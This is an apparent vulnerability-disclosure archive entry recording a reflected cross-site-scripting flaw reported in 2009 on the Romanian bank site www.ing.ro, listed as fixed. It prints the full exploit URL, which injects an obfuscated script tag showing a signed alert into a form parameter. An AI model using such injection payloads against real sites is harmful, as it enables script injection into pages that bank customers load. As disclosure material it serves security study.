Security researcher TurKPoweR, has submitted on 21/06/2009 a cross-site-scripting (XSS) vulnerability affecting www.ing.ro, which at the time of submission ranked 108621 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 01/04/2012. It is currently fixed. |
Date submitted: 21/06/2009 |
Date published: 01/04/2012 |
Date fixed: 01/04/2012 | Status: FIXED |
Author: TurKPoweR |
Domain: www.ing.ro |
Category: XSS |
Pagerank: 108621 |
URL: http://www.ing.ro/ing/ing/Carduri/Card-Cont-ROL/Aplica-acum.html?param_render=true¶m_firstPage=- 1¶m_caID=99461e33-47ff-4edf-95f7-9d8a8f0fc9af¶m_actionID=2¶m_pageID=2¶m_currency=>"> <ScRiPt%20%0a%0d>alert('XSS%20By%20TurKPoweR%20-%20FROM%20TURKEY')%3B</ScRiPt>¶m_pageAction=next ¶m_CPageInfo_length=3¶m_CPageInfo%5B0%5D%2Ename=Date%20de%20contact¶m_CPageInfo%5B0%5D%2 Estate=1¶m_CPageInfo%5B0%5D%2Eid=2¶m_CPageInfo%5B0%5D%2Ecols=2¶m_CPageInfo%5B0%5D%2Erows =8¶m_CPageInfo%5B0%5D%2EwebControlName=null¶m_CPageInfo%5B1%5D%2Ename=Date%20personale¶m _CPageInfo%5B1%5D%2Estate=1¶m_CPageInfo%5B1%5D%2Eid=3¶m_CPageInfo%5B1%5D%2Ecols=2¶m_CPag eInfo%5B1%5D%2Erows=8¶m_CPageInfo%5B1%5D%2EwebControlName=null¶m_CPageInfo%5B2%5D%2Ename=Inf ormatii%20produs¶m_CPageInfo%5B2%5D%2Estate=1¶m_CPageInfo%5B2%5D%2Eid=10¶m_CPageInfo%5B2 %5D%2Ecols=2¶m_CPageInfo%5B2%5D%2Erows=8¶m_CPageInfo%5B2%5D%2EwebControlName=null&render_Nam e=111-222-1933email@address.tst&render_Surname=111-222-1933email@address.tst&render_PhoneNo=111-222- 1933email@address.tst&render_Email=111-222-1933email@address.tst&render_ContactHours=0&Submit22=Pasu l%20Urmator%20%26gt%3B%26gt%3B |
Click here to view the mirror
|
|
|